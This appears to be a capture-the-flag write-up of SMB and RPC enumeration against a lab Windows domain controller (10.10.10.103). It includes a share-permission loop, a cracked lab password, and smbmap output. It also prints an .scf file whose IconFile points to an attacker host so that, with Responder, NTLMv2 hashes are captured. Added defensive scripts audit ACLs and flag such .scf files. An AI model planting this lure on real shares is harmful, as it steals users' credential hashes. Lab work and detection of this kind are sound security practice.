# SMB

```
PORT    STATE SERVICE       REASON          VERSION
445/tcp open  microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
|_smb-print-text: false
| smb2-time: 
|   date: 2022-08-11T15:35:38
|_  start_date: 2022-08-11T15:33:45
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0.2: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.1.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
```

## SMB NULL SHARES

![](/files/8lfhH1Fmcbd0SdMx4r0e)

```
	dr--r--r--                0 Mon Jul  2 15:16:54 2018	2018
	.\Department Shares\Users\*
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	.
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	..
	dr--r--r--                0 Mon Jul  2 15:18:43 2018	amanda
	dr--r--r--                0 Mon Jul  2 15:19:06 2018	amanda_adm
	dr--r--r--                0 Mon Jul  2 15:18:28 2018	bill
	dr--r--r--                0 Mon Jul  2 15:18:31 2018	bob
	dr--r--r--                0 Mon Jul  2 15:19:14 2018	chris
	dr--r--r--                0 Mon Jul  2 15:18:39 2018	henry
	dr--r--r--                0 Mon Jul  2 15:18:34 2018	joe
	dr--r--r--                0 Mon Jul  2 15:18:53 2018	jose
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	lkys37en
	dr--r--r--                0 Mon Jul  2 15:18:48 2018	morgan
	dr--r--r--                0 Mon Jul  2 15:19:20 2018	mrb3n
	dr--r--r--                0 Wed Sep 26 01:45:32 2018	Public
```

This gave me a list of other users who I might be able to roast.

Unfortunately for us, Kerberos isn't exposed externally, which is why we were unable to perform AS-REP roasting attacks.

However, after mounting the share we were able to see the users and the permissions on these folders.

Using the following script:

```
tput civis
for directory in $(ls); do
  echo -e "\n [*] Enumerating Permissions in the $directory:\n"
  echo -e "\t$(smbcacls "//10.10.10.103/Department Shares" "Users/$directory" -N | grep "Everyone")"
done
tput cnorm

# output (only the Public folder shown):
[*] Enumerating Permissions in the Public:

	ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
```
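The loop above only greps for `Everyone`; the audit a defender wants is the same check done systematically over every folder, flagging any broad principal that is granted write-level rights. The following is an added example (not from the original notes) that parses the `ACL:principal:type/flags/perm` lines smbcacls prints; the sample output in `SAMPLE` is constructed to match the shape shown above.

```python
import re
from dataclasses import dataclass

# Parses smbcacls ACL lines and flags entries that give broad groups write rights.
# Constructed sample data below; BROAD_PRINCIPALS is an assumed audit policy.
ACL_RE = re.compile(r"^ACL:(?P<who>[^:]+):(?P<type>ALLOWED|DENIED)/(?P<flags>[^/]*)/(?P<perm>.+)$")
BROAD_PRINCIPALS = {"Everyone", "Authenticated Users", "Domain Users", "Users"}

@dataclass
class Finding:
    directory: str
    principal: str
    flags: str
    perm: str

def parse_acl_line(line):
    """Return the ACL fields of one smbcacls line, or None for non-ACL lines."""
    m = ACL_RE.match(line.strip())
    return m.groupdict() if m else None

def writable(perm):
    # smbcacls prints either a keyword (FULL, CHANGE, READ) or a letter set from RWXDPO
    if perm in ("FULL", "CHANGE"):
        return True
    if perm == "READ":
        return False
    return any(c in perm for c in "WD")

def audit(output_by_dir):
    """Map of directory -> raw smbcacls output; returns over-permissive ALLOWED entries."""
    findings = []
    for directory, text in output_by_dir.items():
        for line in text.splitlines():
            acl = parse_acl_line(line)
            if not acl or acl["type"] != "ALLOWED":
                continue
            if acl["who"] in BROAD_PRINCIPALS and writable(acl["perm"]):
                findings.append(Finding(directory, acl["who"], acl["flags"], acl["perm"]))
    return findings

# Constructed sample: one smbcacls run per user folder, in the format seen above
SAMPLE = {
    "Users/Public": "ACL:Everyone:ALLOWED/OI|CI/FULL\nACL:Everyone:ALLOWED/OI|CI|I/READ\n",
    "Users/amanda": "ACL:Everyone:ALLOWED/OI|CI|I/READ\nACL:HTB\\amanda:ALLOWED/OI|CI/FULL\n",
}

if __name__ == "__main__":
    print("\n".join(f"{f.directory}: {f.principal} {f.perm} ({f.flags})" for f in audit(SAMPLE)))
```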

Since we have write access to the Public folder there are many ways we could get a shell from this; we could possibly steal hashes, or place files such as an .hta file.

After starting Responder and placing the following .scf file in the share, I was able to capture NTLMv2 hashes.

```
[Shell]
Command=2
IconFile=\\10.10.14.7\home\kali\driver.scf
[Taskbar]
Command=ToggleDesktop
```
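From the defensive side, the tell-tale of this lure is an `.scf` file on a writable share whose `IconFile` is a UNC path to a host that should not be serving icons. The following is an added detection helper (not part of the original notes) that parses the INI-style SCF format and walks a mounted share for such files; `ALLOWED_HOSTS` is an assumed allowlist and the test inputs are constructed.

```python
import re
from pathlib import Path

# Flags .scf files whose IconFile points at a UNC path on an untrusted host.
# ALLOWED_HOSTS is an assumption standing in for a real list of icon/file servers.
ALLOWED_HOSTS = {"fileserver.htb.local"}
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\")

def parse_scf(text):
    """Return {section: {key: value}} (names lower-cased) for the INI-style SCF format."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def remote_icon_host(text):
    """Host named by [Shell] IconFile when it is a UNC path, else None."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    m = UNC_RE.match(icon)
    return m.group("host").lower() if m else None

def suspicious_scf(text):
    """True when IconFile is a UNC path to a host outside the allowlist."""
    host = remote_icon_host(text)
    return host is not None and host not in ALLOWED_HOSTS

def scan_share(root):
    """Walk a mounted share and return paths of .scf files with an untrusted UNC IconFile."""
    hits = []
    for path in Path(root).rglob("*.scf"):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        if suspicious_scf(text):
            hits.append(str(path))
    return hits
```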

![](/files/uKg9CPIjw5wUqAWp4PBk)

Now we can enumerate again with these credentials and start all over. The password was Ashare1972.

* [x] cme
* [x] winrm
* [x] psexec
* [x] ldap
* [ ] rpc
* [ ] smbshare
* [x] kerberosroast

```
smbmap -H 10.10.10.103 -u 'amanda' -p 'Ashare1972'       
[+] IP: 10.10.10.103:445	Name: HTB.LOCAL                                         
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	Department Shares                                 	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Operations                                        	NO ACCESS	
	SYSVOL                                            	READ ONLY	Logon server share 

```

With these credentials we could have additional permissions to access other shares.

## RPC

```
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[amanda] rid:[0x450]
user:[mrlky] rid:[0x643]
user:[sizzler] rid:[0x644]
```
